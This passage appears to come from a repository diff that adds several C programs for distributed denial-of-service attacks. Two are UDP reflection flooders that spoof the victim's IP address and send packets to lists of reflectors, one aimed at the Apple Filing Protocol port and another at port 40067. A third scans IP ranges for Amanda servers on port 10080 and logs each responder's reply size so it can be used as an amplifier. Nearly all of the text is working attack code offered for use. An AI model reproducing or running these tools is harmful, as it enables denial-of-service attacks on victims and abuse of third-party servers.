||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,306 @@
|
|||
#include <pcap.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h> // for exit()
|
||||
#include <string.h> //for memset
|
||||
#include <sys/ioctl.h>
|
||||
#include <net/if.h>
|
||||
#include <sys/socket.h>
|
||||
#include <arpa/inet.h> // for inet_ntoa()
|
||||
#include <net/ethernet.h>
|
||||
#include <netinet/udp.h> //Provides declarations for udp header
|
||||
#include <netinet/ip.h> //Provides declarations for ip header
|
||||
#include <pthread.h>
|
||||
#include <semaphore.h>
|
||||
#include <signal.h>
|
||||
#include <sys/resource.h>
|
||||
#include <unistd.h>
|
||||
static unsigned int payloadsize = 64;
|
||||
static unsigned int xport = 10080;
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer);
|
||||
|
||||
struct buffer
|
||||
{
|
||||
void *data;
|
||||
int size;
|
||||
struct buffer *next;
|
||||
struct buffer *prev;
|
||||
};
|
||||
struct buffer *head;
|
||||
|
||||
char *ipv4;
|
||||
int processed,over,total,i,j;
|
||||
struct sockaddr_in dest;
|
||||
pthread_mutex_t buf_mutex = PTHREAD_MUTEX_INITIALIZER;
|
||||
sem_t loop_sem;
|
||||
int running_threads = 0;
|
||||
volatile int found_srvs = 0;
|
||||
volatile unsigned long per_thread = 0;
|
||||
volatile unsigned long start = 0;
|
||||
volatile unsigned long scanned = 0;
|
||||
int sleep_between = 0;
|
||||
volatile int bytes_sent = 0;
|
||||
volatile unsigned long hosts_done = 0;
|
||||
FILE *fd;
|
||||
|
||||
void *readthread()
|
||||
{
|
||||
struct buffer *ourhead = head;
|
||||
struct sockaddr_in saddr;
|
||||
while(1)
|
||||
{
|
||||
sem_wait(&loop_sem);
|
||||
while(ourhead->data == NULL){ ourhead = ourhead->next; }
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *buf = malloc(ourhead->size);
|
||||
int size = ourhead->size;
|
||||
memcpy(buf, ourhead->data, ourhead->size);
|
||||
free(ourhead->data);
|
||||
ourhead->data = NULL;
|
||||
ourhead->size = 0;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
memset(&saddr, 0, sizeof(saddr));
|
||||
struct iphdr *iph = (struct iphdr*)(buf + sizeof(struct ethhdr));
|
||||
saddr.sin_addr.s_addr = iph->saddr;
|
||||
struct udphdr *udph = (struct udphdr *)(buf + sizeof(struct ethhdr) + sizeof(struct iphdr));
|
||||
if(ntohs(udph->source) == xport)
|
||||
{
|
||||
int body_length = size - sizeof(struct ethhdr) - sizeof(struct iphdr) - sizeof(struct udphdr);
|
||||
fprintf(fd,"%s %d\n",inet_ntoa(saddr.sin_addr),body_length);
|
||||
fflush(fd);
|
||||
found_srvs++;
|
||||
}
|
||||
free(buf);
|
||||
processed++;
|
||||
ourhead = ourhead->next;
|
||||
}
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
running_threads++;
|
||||
int thread_id = (int)par1;
|
||||
unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
|
||||
unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
|
||||
unsigned long w;
|
||||
int y;
|
||||
unsigned char buf[65536];
|
||||
memcpy(buf, "\x41\x6d\x61\x6e\x64\x61\x20\x32\x2e\x33\x20\x52\x45\x51\x20\x48\x41\x4e\x44\x4c\x45\x20\x30\x30\x30\x2d\x36\x35\x36\x33\x37\x33\x37\x33\x20\x53\x45\x51\x20\x39\x35\x34\x35\x36\x38\x38\x30\x30\x0A\x53\x45\x52\x56\x49\x43\x45\x20\x61\x6d\x61\x6e\x64\x61\x0A", payloadsize);
|
||||
int sizeofpayload = payloadsize;
|
||||
int sock;
|
||||
if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
|
||||
perror("cant open socket");
|
||||
exit(-1);
|
||||
}
|
||||
for(w=ntohl(start_ip);w<htonl(end);w++)
|
||||
{
|
||||
struct sockaddr_in servaddr;
|
||||
bzero(&servaddr, sizeof(servaddr));
|
||||
servaddr.sin_family = AF_INET;
|
||||
servaddr.sin_addr.s_addr=htonl(w);
|
||||
servaddr.sin_port=htons(xport);
|
||||
sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
|
||||
bytes_sent+=sizeofpayload;
|
||||
scanned++;
|
||||
hosts_done++;
|
||||
usleep(sleep_between*1000);
|
||||
}
|
||||
close(sock);
|
||||
running_threads--;
|
||||
return;
|
||||
}
|
||||
|
||||
void sighandler(int sig)
|
||||
{
|
||||
fclose(fd);
|
||||
printf("\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
void *printthread(void *argvs)
|
||||
{
|
||||
char **argv = (char **)argvs;
|
||||
int threads = atoi(argv[4]);
|
||||
pthread_t thread;
|
||||
sleep(1);
|
||||
char *str_start = malloc(18);
|
||||
memset(str_start, 0, 18);
|
||||
str_start = argv[1];
|
||||
char *str_end = malloc(18);
|
||||
memset(str_end, 0, 18);
|
||||
str_end = argv[2];
|
||||
start = inet_addr(str_start);
|
||||
per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
|
||||
unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
|
||||
int i;
|
||||
for(i = 0;i<threads;i++){
|
||||
pthread_create( &thread, NULL, &flood, (void *) i);
|
||||
}
|
||||
char *temp = (char *)malloc(17);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Reflectors");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "IP/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Bytes/s");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "Threads");
|
||||
printf("%-16s", temp);
|
||||
memset(temp, 0, 17);
|
||||
sprintf(temp, "%");
|
||||
printf("%s", temp);
|
||||
printf("\n");
|
||||
|
||||
char *new;
|
||||
new = (char *)malloc(16*6);
|
||||
while (running_threads > 0)
|
||||
{
|
||||
printf("\r");
|
||||
memset(new, '\0', 16*6);
|
||||
sprintf(new, "%s|%-15lu", new, found_srvs);
|
||||
sprintf(new, "%s|%-15d", new, scanned);
|
||||
sprintf(new, "%s|%-15d", new, bytes_sent);
|
||||
sprintf(new, "%s|%-15d", new, running_threads);
|
||||
memset(temp, 0, 17);
|
||||
int percent_done=((double)(hosts_done)/(double)(toscan))*100;
|
||||
sprintf(temp, "%d%%", percent_done);
|
||||
sprintf(new, "%s|%s", new, temp);
|
||||
printf("%s", new);
|
||||
fflush(stdout);
|
||||
bytes_sent=0;
|
||||
scanned = 0;
|
||||
sleep(1);
|
||||
}
|
||||
printf("\n");
|
||||
fclose(fd);
|
||||
exit(0);
|
||||
}
|
||||
|
||||
int main(int argc, char *argv[ ])
|
||||
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "The right fucking way: %s <1.0.0.0> <255.255.255.255> <list> <threads> <delay>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fd = fopen(argv[3], "a");
|
||||
sleep_between = atoi(argv[5]);
|
||||
int num_threads = atoi(argv[4]);
|
||||
|
||||
const rlim_t kOpenFD = 1024 + (num_threads * 2);
|
||||
struct rlimit rl;
|
||||
int result;
|
||||
rl.rlim_cur = kOpenFD;
|
||||
rl.rlim_max = kOpenFD;
|
||||
result = setrlimit(RLIMIT_NOFILE, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_nofile");
|
||||
fprintf(stderr, "setrlimit_nofile returned result = %d\n", result);
|
||||
}
|
||||
bzero(&rl, sizeof(struct rlimit));
|
||||
rl.rlim_cur = 256 * 1024;
|
||||
rl.rlim_max = 4096 * 1024;
|
||||
result = setrlimit(RLIMIT_STACK, &rl);
|
||||
if (result != 0)
|
||||
{
|
||||
perror("setrlimit_stack");
|
||||
fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
|
||||
}
|
||||
|
||||
signal(SIGINT, &sighandler);
|
||||
|
||||
pcap_if_t *alldevsp;
|
||||
pcap_t *handle; //Handle of the device that shall be sniffed
|
||||
|
||||
char errbuf[100] , *devname , devs[100][100];
|
||||
int count = 1 , n;
|
||||
|
||||
if( pcap_findalldevs( &alldevsp , errbuf) )
|
||||
{
|
||||
exit(1);
|
||||
}
|
||||
|
||||
devname = alldevsp->name;
|
||||
ipv4 = malloc(16);
|
||||
bzero(ipv4, 16);
|
||||
struct ifreq ifc;
|
||||
int res;
|
||||
int sockfd = socket(AF_INET, SOCK_DGRAM, 0);
|
||||
|
||||
if(sockfd < 0) exit(-1);
|
||||
strcpy(ifc.ifr_name, devname);
|
||||
res = ioctl(sockfd, SIOCGIFADDR, &ifc);
|
||||
close(sockfd);
|
||||
if(res < 0) exit(-1);
|
||||
strcpy(ipv4, inet_ntoa(((struct sockaddr_in*)&ifc.ifr_addr)->sin_addr));
|
||||
printf("Opening device %s for sniffing ... " , devname);
|
||||
handle = pcap_open_live(devname , 65536 , 1 , 0 , errbuf);
|
||||
|
||||
if (handle == NULL)
|
||||
{
|
||||
fprintf(stderr, "Couldn't open device %s : %s\n" , devname , errbuf);
|
||||
exit(1);
|
||||
}
|
||||
printf("Done\n");
|
||||
|
||||
sem_init(&loop_sem, 0, -1);
|
||||
i = 1024*1000;
|
||||
while(i--)
|
||||
{
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(head, sizeof(struct buffer));
|
||||
head->data = NULL;
|
||||
head->size = 0;
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct buffer *new_node = (struct buffer *)malloc(sizeof(struct buffer));
|
||||
bzero(new_node, sizeof(struct buffer));
|
||||
new_node->data = NULL;
|
||||
new_node->size = 0;
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_t prnthread;
|
||||
pthread_create( &prnthread, NULL, &printthread, (void *)argv);
|
||||
pthread_t redthread;
|
||||
pthread_create( &redthread, NULL, &readthread, NULL);
|
||||
|
||||
pcap_loop(handle , -1 , process_packet , NULL);
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void process_packet(void *args, struct pcap_pkthdr *header, void *buffer)
|
||||
{
|
||||
int size = header->len;
|
||||
|
||||
//Get the IP Header part of this packet , excluding the ethernet header
|
||||
struct iphdr *iph = (struct iphdr*)(buffer + sizeof(struct ethhdr));
|
||||
memset(&dest, 0, sizeof(dest));
|
||||
dest.sin_addr.s_addr = iph->daddr;
|
||||
|
||||
if(iph->protocol == 17 && strcmp(inet_ntoa(dest.sin_addr), ipv4) == 0)
|
||||
{
|
||||
//toss into buffer
|
||||
if(head->data != NULL) over++;
|
||||
pthread_mutex_lock(&buf_mutex);
|
||||
void *temp = malloc(size);
|
||||
memcpy(temp, buffer, size);
|
||||
head->data = temp;
|
||||
head->size = size;
|
||||
head = head->next;
|
||||
pthread_mutex_unlock(&buf_mutex);
|
||||
sem_post(&loop_sem);
|
||||
total++;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,230 @@
|
|||
/*
|
||||
private amplification
|
||||
apple filing protocol.
|
||||
|
||||
Transmissional.
|
||||
*/
|
||||
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
/*
|
||||
let us define container sets.
|
||||
we could use this to initialise more data response.
|
||||
*/
|
||||
|
||||
#define get_response 0x002
|
||||
#define meta_iso_req 0x00FFFF
|
||||
#define mobset_rw_se 0x000000000
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 18; /* we set the payload length as an individual integer as sizeof() is NOT reliable */
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100"); /* jason this wasn't necessary yano */
|
||||
}
|
||||
#define get_iso "\x01\x01\x04\x06\x01\x01\x04\x06\x01\x01\x04\x06"
|
||||
#define net_iso "\x01\x01\x04\x06\x01\x01\x04\x06\x01\x01\x04\x06\x01\x01\x04\x06\x01\x01\x04\x06"
|
||||
void setup_udp_header(struct udphdr *udph) // setup our little cutie
|
||||
{
|
||||
/* we are establishing a full form connection to
|
||||
snmp. this should force release a get response
|
||||
which should include device data and traffic_D.
|
||||
response should be 1000+
|
||||
*/
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(548);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x0f\x00", 18);
|
||||
udph->len=htons(sizeof(struct udphdr) + 18);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n"); // errors
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026); // <-- you should try to play around with this
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n"); // errors
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,211 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
#include <time.h>
|
||||
#include <pthread.h>
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <sys/socket.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/udp.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 8192
|
||||
#define PHI 0x9e3779b9
|
||||
static uint32_t Q[4096], c = 362436;
|
||||
struct list
|
||||
{
|
||||
struct sockaddr_in data;
|
||||
struct list *next;
|
||||
struct list *prev;
|
||||
};
|
||||
struct list *head;
|
||||
volatile int tehport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
|
||||
void init_rand(uint32_t x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++)
|
||||
{
|
||||
Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
|
||||
}
|
||||
}
|
||||
uint32_t rand_cmwc(void)
|
||||
{
|
||||
uint64_t t, a = 18782LL;
|
||||
static uint32_t i = 4095;
|
||||
uint32_t x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int nwords)
|
||||
{
|
||||
unsigned long sum = 0;
|
||||
for (sum = 0; nwords > 0; nwords--)
|
||||
sum += *buf++;
|
||||
sum = (sum >> 16) + (sum & 0xffff);
|
||||
sum += (sum >> 16);
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 1;
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = IPPROTO_UDP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
void setup_udp_header(struct udphdr *udph)
|
||||
{
|
||||
udph->source = htons(5678);
|
||||
udph->dest = htons(40067);
|
||||
udph->check = 0;
|
||||
memcpy((void *)udph + sizeof(struct udphdr), "0x01", 1);
|
||||
udph->len=htons(sizeof(struct udphdr) + 1);
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
struct thread_data *td = (struct thread_data *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin = td->sin;
|
||||
struct list *list_node = td->list_node;
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_udp_header(udph);
|
||||
udph->source = htons(rand() % 65535 - 1026);
|
||||
iph->saddr = sin.sin_addr.s_addr;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
|
||||
list_node = list_node->next;
|
||||
iph->daddr = list_node->data.sin_addr.s_addr;
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
srand(time(NULL));
|
||||
int i = 0;
|
||||
head = NULL;
|
||||
fprintf(stdout, "Setting up sockets...\n");
|
||||
int max_len = 128;
|
||||
char *buffer = (char *) malloc(max_len);
|
||||
buffer = memset(buffer, 0x00, max_len);
|
||||
int num_threads = atoi(argv[4]);
|
||||
int maxpps = atoi(argv[5]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
int multiplier = 20;
|
||||
FILE *list_fd = fopen(argv[3], "r");
|
||||
while (fgets(buffer, max_len, list_fd) != NULL) {
|
||||
if ((buffer[strlen(buffer) - 1] == '\n') ||
|
||||
(buffer[strlen(buffer) - 1] == '\r')) {
|
||||
buffer[strlen(buffer) - 1] = 0x00;
|
||||
if(head == NULL)
|
||||
{
|
||||
head = (struct list *)malloc(sizeof(struct list));
|
||||
bzero(&head->data, sizeof(head->data));
|
||||
head->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
head->next = head;
|
||||
head->prev = head;
|
||||
} else {
|
||||
struct list *new_node = (struct list *)malloc(sizeof(struct list));
|
||||
memset(new_node, 0x00, sizeof(struct list));
|
||||
new_node->data.sin_addr.s_addr=inet_addr(buffer);
|
||||
new_node->prev = head;
|
||||
new_node->next = head->next;
|
||||
head->next = new_node;
|
||||
}
|
||||
i++;
|
||||
} else {
|
||||
continue;
|
||||
}
|
||||
}
|
||||
struct list *current = head->next;
|
||||
pthread_t thread[num_threads];
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_addr.s_addr = inet_addr(argv[1]);
|
||||
struct thread_data td[num_threads];
|
||||
for(i = 0;i<num_threads;i++){
|
||||
td[i].thread_id = i;
|
||||
td[i].sin= sin;
|
||||
td[i].list_node = current;
|
||||
pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
|
||||
}
|
||||
fprintf(stdout, "Starting flood...\n");
|
||||
for(i = 0;i<(atoi(argv[6])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
